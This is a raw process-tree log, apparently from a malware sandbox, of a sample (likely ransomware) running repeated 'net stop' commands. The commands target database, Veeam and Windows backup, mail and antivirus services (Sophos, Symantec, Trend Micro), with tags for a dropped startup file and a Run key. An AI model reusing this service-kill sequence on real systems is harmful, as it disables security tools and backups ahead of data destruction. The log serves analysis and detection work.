C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPS"3⤵PID:4512
-
C:\Windows\system32\net.exenet stop "MSOLAP$TPS"4⤵PID:2452
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSOLAP$TPS"5⤵PID:4460
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPSAMA"3⤵PID:5000
-
C:\Windows\system32\net.exenet stop "MSOLAP$TPSAMA"4⤵PID:3968
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSOLAP$TPSAMA"5⤵PID:4844
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$BKUPEXEC"3⤵PID:2864
-
C:\Windows\system32\net.exenet stop "MSSQL$BKUPEXEC"4⤵PID:4956
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$BKUPEXEC"5⤵PID:4788
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$ECWDB2"3⤵PID:5100
-
C:\Windows\system32\net.exenet stop "MSSQL$ECWDB2"4⤵PID:3616
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$ECWDB2"5⤵PID:2116
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTICEMGT"3⤵PID:1736
-
C:\Windows\system32\net.exenet stop "MSSQL$PRACTICEMGT"4⤵PID:3032
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$PRACTICEMGT"5⤵PID:1384
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTTICEBGC"3⤵PID:2604
-
C:\Windows\system32\net.exenet stop "MSSQL$PRACTTICEBGC"4⤵PID:1356
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$PRACTTICEBGC"5⤵PID:1224
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$PROFXENGAGEMENT"3⤵PID:2100
-
C:\Windows\system32\net.exenet stop "MSSQL$PROFXENGAGEMENT"4⤵PID:2768
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$PROFXENGAGEMENT"5⤵PID:276
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SBSMONITORING"3⤵PID:4244
-
C:\Windows\system32\net.exenet stop "MSSQL$SBSMONITORING"4⤵PID:4128
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SBSMONITORING"5⤵PID:4880
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SHAREPOINT"3⤵PID:4216
-
C:\Windows\system32\net.exenet stop "MSSQL$SHAREPOINT"4⤵PID:4912
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SHAREPOINT"5⤵PID:4936
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SQL_2008"3⤵PID:2236
-
C:\Windows\system32\net.exenet stop "MSSQL$SQL_2008"4⤵PID:1920
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SQL_2008"5⤵PID:3136
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SYSTEM_BGC"3⤵PID:4276
-
C:\Windows\system32\net.exenet stop "MSSQL$SYSTEM_BGC"4⤵PID:1684
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SYSTEM_BGC"5⤵PID:2324
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$TPS"3⤵PID:1472
-
C:\Windows\system32\net.exenet stop "MSSQL$TPS"4⤵PID:4960
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$TPS"5⤵PID:4388
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$TPSAMA"3⤵PID:636
-
C:\Windows\system32\net.exenet stop "MSSQL$TPSAMA"4⤵PID:4296
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$TPSAMA"5⤵PID:2292
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"3⤵PID:4468
-
C:\Windows\system32\net.exenet stop "MSSQL$VEEAMSQL2008R2"4⤵PID:4992
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"5⤵PID:4152
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2012"3⤵PID:4188
-
C:\Windows\system32\net.exenet stop "MSSQL$VEEAMSQL2012"4⤵PID:2612
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2012"5⤵PID:340
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher"3⤵PID:888
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher"4⤵PID:3676
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher"5⤵PID:4980
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$PROFXENGAGEMENT"3⤵PID:976
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$PROFXENGAGEMENT"4⤵PID:660
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$PROFXENGAGEMENT"5⤵PID:3684
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SBSMONITORING"3⤵PID:4400
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$SBSMONITORING"4⤵PID:4384
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$SBSMONITORING"5⤵PID:2696
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SHAREPOINT"3⤵PID:4552
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$SHAREPOINT"4⤵PID:1740
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$SHAREPOINT"5⤵PID:1776
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SQL_2008"3⤵PID:2684
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$SQL_2008"4⤵PID:1928
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$SQL_2008"5⤵PID:1520
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SYSTEM_BGC"3⤵PID:3048
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$SYSTEM_BGC"4⤵PID:3956
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$SYSTEM_BGC"5⤵PID:1148
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPS"3⤵PID:4312
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$TPS"4⤵PID:4228
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$TPS"5⤵PID:4360
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPSAMA"3⤵PID:4572
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$TPSAMA"4⤵PID:2568
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$TPSAMA"5⤵PID:3500
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLSERVER"3⤵PID:4192
-
C:\Windows\system32\net.exenet stop "MSSQLSERVER"4⤵PID:4204
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLSERVER"5⤵PID:4284
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper100"3⤵PID:4584
-
C:\Windows\system32\net.exenet stop "MSSQLServerADHelper100"4⤵PID:1216
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLServerADHelper100"5⤵PID:4568
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLServerOLAPService"3⤵PID:896
-
C:\Windows\system32\net.exenet stop "MSSQLServerOLAPService"4⤵PID:5068
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLServerOLAPService"5⤵PID:1132
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MySQL80"3⤵PID:4540
-
C:\Windows\system32\net.exenet stop "MySQL80"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4180 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MySQL80"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:5056
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MySQL57"3⤵PID:2952
-
C:\Windows\system32\net.exenet stop "MySQL57"4⤵PID:1592
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MySQL57"5⤵PID:4268
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "OracleClientCache80"3⤵PID:3932
-
C:\Windows\system32\net.exenet stop "OracleClientCache80"4⤵PID:4636
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "OracleClientCache80"5⤵PID:1272
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "PDVFSService"3⤵PID:4804
-
C:\Windows\system32\net.exenet stop "PDVFSService"4⤵PID:2776
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "PDVFSService"5⤵PID:904
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "POP3Svc"3⤵PID:4000
-
C:\Windows\system32\net.exenet stop "POP3Svc"4⤵PID:4492
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "POP3Svc"5⤵PID:416
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer"3⤵PID:5020
-
C:\Windows\system32\net.exenet stop "ReportServer"4⤵PID:972
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer"5⤵PID:1072
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer$SQL_2008"3⤵PID:596
-
C:\Windows\system32\net.exenet stop "ReportServer$SQL_2008"4⤵PID:4488
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer$SQL_2008"5⤵PID:4160
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer$SYSTEM_BGC"3⤵PID:4800
-
C:\Windows\system32\net.exenet stop "ReportServer$SYSTEM_BGC"4⤵PID:4460
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer$SYSTEM_BGC"5⤵PID:2452
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer$TPS"3⤵PID:4828
-
C:\Windows\system32\net.exenet stop "ReportServer$TPS"4⤵PID:4844
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer$TPS"5⤵PID:3968
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer$TPSAMA"3⤵PID:2024
-
C:\Windows\system32\net.exenet stop "ReportServer$TPSAMA"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2320 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer$TPSAMA"5⤵PID:4764
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "RESvc"3⤵PID:4772
-
C:\Windows\system32\net.exenet stop "RESvc"4⤵PID:4940
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "RESvc"5⤵PID:5116
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "sacsvr"3⤵PID:4840
-
C:\Windows\system32\net.exenet stop "sacsvr"4⤵PID:700
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "sacsvr"5⤵PID:2136
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SamSs"3⤵PID:1380
-
C:\Windows\system32\net.exenet stop "SamSs"4⤵PID:5100
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs"5⤵PID:4848
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SAVAdminService"3⤵PID:3664
-
C:\Windows\system32\net.exenet stop "SAVAdminService"4⤵PID:388
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SAVAdminService"5⤵PID:4892
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SAVService"3⤵PID:4908
-
C:\Windows\system32\net.exenet stop "SAVService"4⤵PID:1224
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SAVService"5⤵PID:3344
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Smcinst"3⤵PID:252
-
C:\Windows\system32\net.exenet stop "Smcinst"4⤵PID:3496
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Smcinst"5⤵PID:276
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SmcService"3⤵PID:2020
-
C:\Windows\system32\net.exenet stop "SmcService"4⤵PID:4876
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SmcService"5⤵PID:4920
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SMTPSvc"3⤵PID:3724
-
C:\Windows\system32\net.exenet stop "SMTPSvc"4⤵PID:4936
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SMTPSvc"5⤵PID:4912
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SNAC"3⤵PID:412
-
C:\Windows\system32\net.exenet stop "SNAC"4⤵PID:3136
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SNAC"5⤵PID:4932
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SntpService"3⤵PID:3228
-
C:\Windows\system32\net.exenet stop "SntpService"4⤵PID:1340
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SntpService"5⤵PID:1152
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "sophossps"3⤵PID:4116
-
C:\Windows\system32\net.exenet stop "sophossps"4⤵PID:4388
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "sophossps"5⤵PID:3440
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$BKUPEXEC"3⤵PID:1472
-
C:\Windows\system32\net.exenet stop "SQLAgent$BKUPEXEC"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4352 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$BKUPEXEC"5⤵PID:2240
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$ECWDB2"3⤵PID:3040
-
C:\Windows\system32\net.exenet stop "SQLAgent$ECWDB2"4⤵PID:4480
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$ECWDB2"5⤵PID:3028
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEBGC"3⤵PID:4992
-
C:\Windows\system32\net.exenet stop "SQLAgent$PRACTTICEBGC"4⤵PID:4468
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$PRACTTICEBGC"5⤵PID:2964
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEMGT"3⤵PID:4052
-
C:\Windows\system32\net.exenet stop "SQLAgent$PRACTTICEMGT"4⤵PID:3768
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$PRACTTICEMGT"5⤵PID:2612
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROFXENGAGEMENT"3⤵PID:2908
-
C:\Windows\system32\net.exenet stop "SQLAgent$PROFXENGAGEMENT"4⤵PID:3484
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$PROFXENGAGEMENT"5⤵PID:3760
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SBSMONITORING"3⤵PID:1796
-
C:\Windows\system32\net.exenet stop "SQLAgent$SBSMONITORING"4⤵PID:4404
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SBSMONITORING"5⤵PID:3684
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SHAREPOINT"3⤵PID:4524
-
C:\Windows\system32\net.exenet stop "SQLAgent$SHAREPOINT"4⤵PID:1264
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SHAREPOINT"5⤵PID:2696
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQL_2008"3⤵PID:2392
-
C:\Windows\system32\net.exenet stop "SQLAgent$SQL_2008"4⤵PID:3816
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SQL_2008"5⤵PID:1776
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SYSTEM_BGC"3⤵PID:3000
-
C:\Windows\system32\net.exenet stop "SQLAgent$SYSTEM_BGC"4⤵PID:2096
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SYSTEM_BGC"5⤵PID:1360
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPS"3⤵PID:1528
-
C:\Windows\system32\net.exenet stop "SQLAgent$TPS"4⤵PID:4340
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$TPS"5⤵PID:1148
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPSAMA"3⤵PID:4308
-
C:\Windows\system32\net.exenet stop "SQLAgent$TPSAMA"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4608 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$TPSAMA"5⤵PID:4536
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"3⤵PID:4628
-
C:\Windows\system32\net.exenet stop "SQLAgent$VEEAMSQL2008R2"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4548 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"5⤵PID:3500
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2012"3⤵PID:1688
-
C:\Windows\system32\net.exenet stop "SQLAgent$VEEAMSQL2012"4⤵PID:3060
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2012"5⤵PID:4284
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLBrowser"3⤵PID:4196
-
C:\Windows\system32\net.exenet stop "SQLBrowser"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1780 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLBrowser"5⤵PID:4568
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLSafeOLRService"3⤵PID:4200
-
C:\Windows\system32\net.exenet stop "SQLSafeOLRService"4⤵PID:5068
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLSafeOLRService"5⤵PID:896
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLSERVERAGENT"3⤵PID:4432
-
C:\Windows\system32\net.exenet stop "SQLSERVERAGENT"4⤵PID:1964
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLSERVERAGENT"5⤵PID:4268
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY"3⤵PID:1388
-
C:\Windows\system32\net.exenet stop "SQLTELEMETRY"4⤵PID:4832
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLTELEMETRY"5⤵PID:1272
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY$ECWDB2"3⤵PID:1028
-
C:\Windows\system32\net.exenet stop "SQLTELEMETRY$ECWDB2"4⤵PID:3648
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLTELEMETRY$ECWDB2"5⤵PID:5032
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLWriter"3⤵PID:4804
-
C:\Windows\system32\net.exenet stop "SQLWriter"4⤵PID:4756
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLWriter"5⤵
- Drops startup file
PID:488
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SstpSvc"3⤵PID:4500
-
C:\Windows\system32\net.exenet stop "SstpSvc"4⤵PID:1220
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc"5⤵PID:1268
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "svcGenericHost"3⤵PID:344
-
C:\Windows\system32\net.exenet stop "svcGenericHost"4⤵PID:4132
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "svcGenericHost"5⤵PID:4160
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "tmlisten"3⤵PID:5004
-
C:\Windows\system32\net.exenet stop "tmlisten"4⤵PID:5016
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "tmlisten"5⤵PID:940
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "TrueKey"3⤵PID:2080
-
C:\Windows\system32\net.exenet stop "TrueKey"4⤵PID:4824
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "TrueKey"5⤵PID:5012
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "UI0Detect"3⤵PID:4944
-
C:\Windows\system32\net.exenet stop "UI0Detect"4⤵PID:4788
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect"5⤵PID:5104
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamBackupSvc"3⤵PID:1980
-
C:\Windows\system32\net.exenet stop "VeeamBackupSvc"4⤵PID:3480
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamBackupSvc"5⤵PID:4780
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamBrokerSvc"3⤵PID:4808
-
C:\Windows\system32\net.exenet stop "VeeamBrokerSvc"4⤵PID:3616
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamBrokerSvc"5⤵PID:2116
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamCatalogSvc"3⤵PID:5096
-
C:\Windows\system32\net.exenet stop "VeeamCatalogSvc"4⤵PID:1104
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamCatalogSvc"5⤵PID:4848
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamCloudSvc"3⤵PID:5100
-
C:\Windows\system32\net.exenet stop "VeeamCloudSvc"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1380 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamCloudSvc"5⤵PID:4904
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamDeploymentService"3⤵PID:388
-
C:\Windows\system32\net.exenet stop "VeeamDeploymentService"4⤵PID:3664
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamDeploymentService"5⤵PID:2156
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamDeploySvc"3⤵PID:1224
-
C:\Windows\system32\net.exenet stop "VeeamDeploySvc"4⤵PID:4908
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamDeploySvc"5⤵PID:1172
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamEnterpriseManagerSvc"3⤵PID:276
-
C:\Windows\system32\net.exenet stop "VeeamEnterpriseManagerSvc"4⤵PID:2180
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamEnterpriseManagerSvc"5⤵PID:252
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamMountSvc"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1488 -
C:\Windows\system32\net.exenet stop "VeeamMountSvc"4⤵PID:260
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamMountSvc"5⤵PID:3120
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamNFSSvc"3⤵PID:3392
-
C:\Windows\system32\net.exenet stop "VeeamNFSSvc"4⤵PID:1504
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamNFSSvc"5⤵PID:3148
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamRESTSvc"3⤵PID:2124
-
C:\Windows\system32\net.exenet stop "VeeamRESTSvc"4⤵PID:4280
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamRESTSvc"5⤵PID:2236
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamTransportSvc"3⤵PID:4928
-
C:\Windows\system32\net.exenet stop "VeeamTransportSvc"4⤵PID:3136
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamTransportSvc"5⤵PID:2632
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "W3Svc"3⤵
- Adds Run key to start application
PID:1464 -
C:\Windows\system32\net.exenet stop "W3Svc"4⤵PID:4272
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "W3Svc"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3088
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "wbengine"3⤵PID:1684
-
C:\Windows\system32\net.exenet stop "wbengine"4⤵PID:1240
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine"5⤵PID:3228
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "WRSVC"3⤵PID:2028
-
C:\Windows\system32\net.exenet stop "WRSVC"4⤵PID:4960
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WRSVC"5⤵PID:3620
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"3⤵PID:4388
-
C:\Windows\system32\net.exenet stop "MSSQL$VEEAMSQL2008R2"4⤵PID:4116
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"5⤵PID:4296
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4112 -
C:\Windows\system32\net.exenet stop "SQLAgent$VEEAMSQL2008R2"4⤵PID:1932
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"5⤵PID:5024
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamHvIntegrationSvc"3⤵PID:4444
-
C:\Windows\system32\net.exenet stop "VeeamHvIntegrationSvc"4⤵PID:4212
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamHvIntegrationSvc"5⤵PID:4152
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "swi_update"3⤵PID:4396
-
C:\Windows\system32\net.exenet stop "swi_update"4⤵PID:3920
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "swi_update"5⤵PID:2456
-
-
-
-
